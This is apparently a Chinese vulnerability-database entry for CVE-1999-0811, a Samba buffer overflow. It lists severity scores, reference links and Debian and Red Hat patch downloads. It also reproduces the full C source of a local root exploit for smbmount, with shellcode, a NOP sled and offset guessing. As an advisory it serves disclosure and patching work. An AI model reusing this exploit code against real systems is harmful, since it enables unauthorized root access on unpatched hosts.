CVE-1999-0811
CVSS5.0
发布时间 :1999-07-21 00:00:00
修订时间 :2008-09-09 08:35:40
NMCOE    

[原文]Buffer overflow in Samba smbd program via a malformed message command.


[CNNVD]Samba Pre-2.0.5漏洞(CNNVD-199907-027)

        Samba smbd程序中存在缓冲区溢出漏洞,可以借助一条畸形的消息命令导致该漏洞。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0811
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0811
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-027
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/536
(UNKNOWN)  BID  536

- 漏洞信息

Samba Pre-2.0.5漏洞
中危 缓冲区溢出
1999-07-21 00:00:00 2005-05-02 00:00:00
远程※本地  
        Samba smbd程序中存在缓冲区溢出漏洞,可以借助一条畸形的消息命令导致该漏洞。

- 公告与补丁

        As pointed out in the message to BugTraq, these problems and more were fixed in Samba version 2.0.5. See
        http://www.samba.org/ for the release notes and download.
        The Samba 2.0.5 release has the following MD5 checksum
         9fa63ff151ae697648020df37464eca9 b samba-2.0.5.tar.gz
        The following fixes for the Samba package released with Debian 2.1 are available:
        Source archives:
        http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.diff.gz
         MD5 checksum: 1354ea63f79e7fa0b4b71685dbac118b
        http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.dsc
         MD5 checksum: e51aeb259913179b60dbddd0b9e70bf5
        http://security.debian.org/dists/stable/updates/source/samba_2.0.5a.orig.tar.gz
         MD5 checksum: 497e5f98ed9b520b18e926ff2f7307ba
        Architecture indendent archives:
        http://security.debian.org/dists/stable/updates/binary-all/samba-doc_2.0.5a-1_all.deb
         MD5 checksum: a9c1addcff72605f66a2334eef5e25ef
        Alpha architecture:
        http://security.debian.org/dists/stable/updates/binary-alpha/samba-common_2.0.5a-1_alpha.deb
         MD5 checksum: 48b9651e2cefd6f6ad820ded9ebc9191
        http://security.debian.org/dists/stable/updates/binary-alpha/samba_2.0.5a-1_alpha.deb
         MD5 checksum: 9bb86e810254fe59feb02e817815b64f
        http://security.debian.org/dists/stable/updates/binary-alpha/smbclient_2.0.5a-1_alpha.deb
         MD5 checksum: 54a89ad98e1167a3265ff30881618b3f
        http://security.debian.org/dists/stable/updates/binary-alpha/smbfs_2.0.5a-1_alpha.deb
         MD5 checksum: 596e22cdf0848fcffd1885f16b38cf83
        http://security.debian.org/dists/stable/updates/binary-alpha/smbwrapper_2.0.5a-1_alpha.deb
         MD5 checksum: 5003fb2a3555daddd3d877529ac65e1e
        http://security.debian.org/dists/stable/updates/binary-alpha/swat_2.0.5a-1_alpha.deb
         MD5 checksum: e99ec78abdac4a8ab1348773e3fa32cd
        Intel ia32 architecture:
        http://security.debian.org/dists/stable/updates/binary-i386/samba-common_2.0.5a-1_i386.deb
         MD5 checksum: eb8b9aa964912975db301f1e83919d36
        http://security.debian.org/dists/stable/updates/binary-i386/samba_2.0.5a-1_i386.deb
         MD5 checksum: 799ab1a56dd726548c33a130edfb9231
        http://security.debian.org/dists/stable/updates/binary-i386/smbclient_2.0.5a-1_i386.deb
         MD5 checksum: f5db7b12b67b24048d7ff915c9ec77ee
        http://security.debian.org/dists/stable/updates/binary-i386/smbfs_2.0.5a-1_i386.deb
         MD5 checksum: b6e90edf5db22cf3952a01f726cb7dd7
        http://security.debian.org/dists/stable/updates/binary-i386/smbwrapper_2.0.5a-1_i386.deb
         MD5 checksum: afabbae0e5ffdd03475a302586d75be5
        http://security.debian.org/dists/stable/updates/binary-i386/swat_2.0.5a-1_i386.deb
         MD5 checksum: bd235e608944c7cd3cc7a17fceab0199
        Motorola 680x0 architecture:
        http://security.debian.org/dists/stable/updates/binary-m68k/samba-common_2.0.5a-1_m68k.deb
         MD5 checksum: 91d8b04d9ef76ca08fff5938007eb235
        http://security.debian.org/dists/stable/updates/binary-m68k/samba_2.0.5a-1_m68k.deb
         MD5 checksum: 6404ca678a20ad17e44b6c74cc3182a1
        http://security.debian.org/dists/stable/updates/binary-m68k/smbclient_2.0.5a-1_m68k.deb
         MD5 checksum: 37f0a04da50f9880b22cb3eaf27b2794
        http://security.debian.org/dists/stable/updates/binary-m68k/smbfs_2.0.5a-1_m68k.deb
         MD5 checksum: 3685040bee6e01039f6588f97dab2c26
        http://security.debian.org/dists/stable/updates/binary-m68k/smbwrapper_2.0.5a-1_m68k.deb
         MD5 checksum: 1a43221c50137cbf5d94f7ad90ab548e
        http://security.debian.org/dists/stable/updates/binary-m68k/swat_2.0.5a-1_m68k.deb
         MD5 checksum: 7b5e610c9b044fe81ac66881ea59af64
        Sun Sparc architecture:
        http://security.debian.org/dists/stable/updates/binary-sparc/samba-common_2.0.5a-1_sparc.deb
         MD5 checksum: f4713291f719de2f32543e0fc37506ea
        http://security.debian.org/dists/stable/updates/binary-sparc/samba_2.0.5a-1_sparc.deb
         MD5 checksum: afb22260c07c60e4afd390bb3e108674
        http://security.debian.org/dists/stable/updates/binary-sparc/smbclient_2.0.5a-1_sparc.deb
         MD5 checksum: 28b22378ddb79b05d29b4b4fac2038c4
        http://security.debian.org/dists/stable/updates/binary-sparc/smbfs_2.0.5a-1_sparc.deb
         MD5 checksum: 8747b52257b451a1e19c93ea10048369
        http://security.debian.org/dists/stable/updates/binary-sparc/smbwrapper_2.0.5a-1_sparc.deb
         MD5 checksum: 420bfe236fcc1591175acd7eb3ad83e0
        http://security.debian.org/dists/stable/updates/binary-sparc/swat_2.0.5a-1_sparc.deb
         MD5 checksum: 38380d76284421c18e557e2d3a413a62
        These files will be moved into
         ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
        For not yet released architectures please refer to the appropriate
        directory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .
        RedHat Fixes:
        Red Hat Linux 6.0:
        Intel: ftp://updates.redhat.com/6.0/i386/
         samba-2.0.5a-1.i386.rpm
         samba-client-2.0.5a-1.i386.rpm
        Alpha: ftp://updates.redhat.com/6.0/alpha/
         samba-2.0.5a-1.alpha.rpm
         samba-client-2.0.5a-1.alpha.rpm
        Sparc: ftp://updates.redhat.com/6.0/sparc/
         samba-2.0.5a-1.sparc.rpm
         samba-client-2.0.5a-1.sparc.rpm
        Source: ftp://updates.redhat.com/6.0/
         samba-2.0.5a-1.src.rpm
        Red Hat Linux 5.2:
        Intel: ftp://updates.redhat.com/5.2/i386/
         samba-2.0.5a-0.5.2.i386.rpm
         samba-client-2.0.5a-0.5.2.i386.rpm
        Alpha: ftp://updates.redhat.com/5.2/alpha/
         samba-2.0.5a-0.5.2.alpha.rpm
         samba-client-2.0.5a-0.5.2.alpha.rpm
        Sparc: ftp://updates.redhat.com/5.2/sparc/
         samba-2.0.5a-0.5.2.sparc.rpm
         samba-client-2.0.5a-0.5.2.sparc.rpm
        Source: ftp://updates.redhat.com/5.2/
         samba-2.0.5a-0.5.2.src.rpm
        Red Hat Linux 4.2:
        Intel: ftp://updates.redhat.com/4.2/i386/
         samba-2.0.5a-0.4.2.i386.rpm
         samba-client-2.0.5a-0.4.2.i386.rpm
        Alpha: ftp://updates.redhat.com/4.2/alpha/
         samba-2.0.5a-0.4.2.alpha.rpm
         samba-client-2.0.5a-0.4.2.alpha.rpm
        Sparc: ftp://updates.redhat.com/4.2/sparc/
         samba-2.0.5a-0.4.2.sparc.rpm
         samba-client-2.0.5a-0.4.2.sparc.rpm
        Source: ftp://updates.redhat.com/4.2/
         samba-2.0.5a-0.4.2.src.rpm

- 漏洞信息 (19428)

Samba Pre-2.0.5 Vulnerabilities (EDBID:19428)
linux local
1999-07-21 Verified
0 Gerald Britton
N/A [点击下载]
source: http://www.securityfocus.com/bid/536/info

There were a number of vulnerabilities in the Samba package pre-2.0.5. The first is a possible denial of service in nmbd (the netbios name service daemon), which resulted in nmbd spinning until killed. The second vulnerability known is a possible buffer overflow problem in smbd which is not exploit in the default install/configuration. A function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition vulnerability which could possible allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default).

/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/

/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME.  To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case).  The user will need to create
** the ./a directory and then execute smbexpl to gain root.  This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work.  Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable.  Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
**          chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/

#include <stdlib.h>
#include <stdio.h>

#define DEFAULT_OFFSET                 -202
#define DEFAULT_BUFFER_SIZE             211
#define DEFAULT_ALIGNMENT                 2
#define NOP                            0x90

/* This shell code is designed to survive being filtered by toupper() */

char shellcode[] =
        "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
        "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
        "\xeb\x05\xe8\xdb\xff\xff\xff"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int alignment=DEFAULT_ALIGNMENT;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) alignment = atoi(argv[3]);
  printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  fprintf(stderr,"Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) (ptr+alignment);
  for (i = 0; i < bsize-alignment; i+=4)
    *(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  ptr = buff + (128 - strlen(shellcode));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  setenv("USER",buff,1);
  execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);
}
		

- 漏洞信息

1025
Samba smdb Malformed Message Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Unknown Vendor Verified

- 漏洞描述

- 时间线

1999-07-21 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.0.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站